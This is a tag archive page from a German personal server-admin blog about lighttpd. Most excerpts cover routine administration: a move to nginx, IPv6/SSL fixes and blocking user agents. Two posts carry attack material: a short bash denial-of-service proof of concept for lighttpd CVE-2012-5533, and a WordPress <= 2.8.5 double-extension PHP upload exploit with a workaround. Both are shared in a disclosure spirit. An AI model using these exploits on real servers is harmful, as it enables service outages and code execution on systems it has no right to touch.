Archiv

Artikel Tagged ‘lighttpd’

Udopi serviert nun mit nginx und spdy

2. Februar 2015 Keine Kommentare

Nginx-logoImmer oefter bin ich an Ecken und Kanten gestossen in denen mit der Lighttpd einfach nicht ausreichend war, eigentlich hatte es selten wirklich gestoert, aber dennoch wollte ich dem nginx eine Chance geben.
Das ist nun schon ein paar Monate her und irgendwie hatte ich ihn schnell wieder verworfen, wieso weiss ich heute nicht mehr, auf jeden Fall habe ich mich in den letzten Tagen etwas mehr mit nginx beschaeftigt nun nun laeuft die Maschinerie die Udopi serviert auf nginx.
Die Umstellung von php-fcgi auf fpm-php mit Sockets stellte sich als recht schmerzfrei heraus, jedoch fehlen mir ein wenig die eigenen php.ini Files.
Nachdem das Geruest nun lief sollte man der Meinung sein, das bisschen Software was hier laeuft wird auch keine Probleme machen, so hatte ich auch keine mit WordPress oder dem Mediawiki und auch der andere Kram der so in irgendwelchen Testecken verweilt laeuft problemlos, aber klar, irgendwas ist immer, diesmal heisst es mal wieder Gallery3.
Naja die „Entwickler“ schreiben ja schon: Only support for Apache… Mehr…

Simpler Lighttpd 1.3.41 DOS Exploit

22. November 2012 Keine Kommentare

#!/bin/bash
# simple lighttpd 1.4.31 DOS POC
# CVE-2012-5533
# http://www.lighttpd.net/2012/11/21/1-4-32/
# http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt
# written by Milan Berger

if [ $# -lt 2 ]
then
echo "usage :$0 "
else
echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi

search.ghcif.de – Yacy Suchmaschine *Update*

1. Dezember 2011 3 Kommentare

ghcif.de hat einen neuen Service eingerichtet, eine Suchmaschine welche auf P2P Basis arbeitet, es handelt sich hierbei um das OpenSource Projekt ‚Yacy‘.
Mittels ‚Yacy‘ ist es moeglich selbst zum Suchmaschinenbetreiber zu werden, das ganze dezentralisiert und frei verfuegbar:

YaCy ist eine Suchmaschinensoftware die sich jeder installieren kann um damit ein Suchportal zu errichten, das Intranet zu indexieren oder andere Daten mit einer Suchfunktion zu erweitern. YaCy kann als Einzelinstallation betrieben werden aber die besondere Fähigkeit der Software ist die Vernetzung in einem Peer-to-Peer Suchmaschinennetz. Ein solches Suchmaschinennetz skaliert mit der Anzahl der Mehr…

Lighttpd, SSL, IPv6 Lags behoben

28. November 2011 1 Kommentar

Es wurde ja auch mal Zeit das ich mich dem Problem annehme.
Seit der Einfuehrung von IPv6 kam es immer wieder zu Verbindungsproblemen auf das Blog nur hatte ich wenig Zeit und Lust das Problem zu beheben vor allem da mir der Ansatz fehlte.
Es ist so, dass ghcif.de automagisch auf die SSL Verbindung umleitet und hier hatte ich das Problem wohl verkannt. Konnektiert ein User via v6 wird versucht auf die V6 umzuleiten, hier jedoch kein connect, da auf IPv6:443 nichts hoert. Nach einem timeout dann das Umleiten auf v4, welches einem User der beides nutzt moeglich ist, reine v6 Kisten bekamen dann einen kompletten Timeout.
Da ich nicht nur eine SSL Seite betreibe und auch diverse VHosts stand ich vor Mehr…

User Agents mit lighttpd oder iptables blocken

25. April 2011 Keine Kommentare

Aktuell fahren ein paar IPs einen merkwuerdigen Angriff auf nopaste.info wie ich meinen Logs entnehmen konnte laeuft dies nun seit ein paar Tagen:

217.122.119.176 nopaste.info - [25/Apr/2011:15:16:01 +0200] "GET / HTTP/1.1" 200 345 "-" "Java/1.6.0_24"
87.161.159.195 nopaste.info - [25/Apr/2011:15:16:01 +0200] "GET / HTTP/1.1" 200 345 "-" "Java/1.6.0_24"
95.96.36.139 nopaste.info - [25/Apr/2011:15:16:01 +0200] "GET / HTTP/1.1" 200 345 "-" "Java/1.6.0_24"

da es sich hierbei um ein paar 100.000 Anfragen handelt, ist es unwahrscheinlich, dass hier ein Programmierer einen komischen Crawler geschrieben hat. Generell eigentlich nichts schlimmes, aber es stoert mich und so habe ich nun einige Moeglichkeiten durchgespielt das ganze zu beenden. Die erste Idee die ich hatte war das ganze mit IPTables einzudaemmen, aber nicht mit rating, sondern via: Mehr…

Probleme mit der Erreichbarkeit des Servers

29. Dezember 2010 Keine Kommentare

Gestern gab es teilweise Probleme mit der Erreichbarkeit der Webseiten die auf UDOPI v2 laufen unserem Webserver, dies lag an einer Umstellung des Webservers, schon lange hatte ich das vor die alten Leichen von unserem ehemaligen Programmierer aufzuraeumen und gestern war die Zeit hierfuer angebrochen.
Bisher liefen nur eigene Projekte auf dem Server und die Konfiguration war kein Problem, bis auf zwei Seiten eines Kollegen welche noch gehostet wurden, doch die Zeiten haben sich geaendert, neue Projekte kommen auf den Server und daher nun die saubere Konfiguration von PHP-CGI ein absolutes Muss, Apachefreunde kennen das und haben auch hiermit teilweise weniger freuden gehabt bei der Ersteinrichtung und so musste auch mit Lighty gestern einiges neu verschraubt werden um im neuen Glanz zu erstrahlen. Mehr…

WordPress <= 2.8.5 Arbitrary PHP Code Execution

12. November 2009 Keine Kommentare

Dawid Golunski hat eine Sicherheitsluecke zu WordPress <= 2.8.5 herausgegeben mit der es als normaler Uploadberechtigter User moeglich sein soll, Schadhaften Content hochzuladen und danach auzufuehren.
Hier zu benoetigt man lediglich einen Browser und koennte ein File wie folgendes erstellen und hochladen:

test-image.php.jpg

Welches folgenden Code enthaelt:

<?php phpinfo(); ?>

Danach kann das File via http://link-to-our-wp-unsecured-blog.com/wp-content/uploads/2009/11/test-vuln.php.jpg aufgerufen werden und sollte die phpinfo Ausgabe anzeigen.

Als Workaround mittels Apache empfiehlt der Autor ein .htaccess File im Uploadverzeichnis von WordPress (wordpress/wp-content/uploads) mit folgendem Content:

deny from all

order deny,allow
allow from all

Bei einem Versuch mit Lighttpd und PHP 5.2.11-pl0-gentoo with Suhosin-Patch 0.9.7 wurde jedoch nicht das gewuenschte Ergebnis gezeigt.

Edit#0: Der Exploit funktioniert nur auf Apache und mit aktiviertem +Multiviews
Edit#1: WordPress 2.8.6 fixed 2 Sicherheitsluecken, die hier beschriebene und eine XSS Schwachstelle.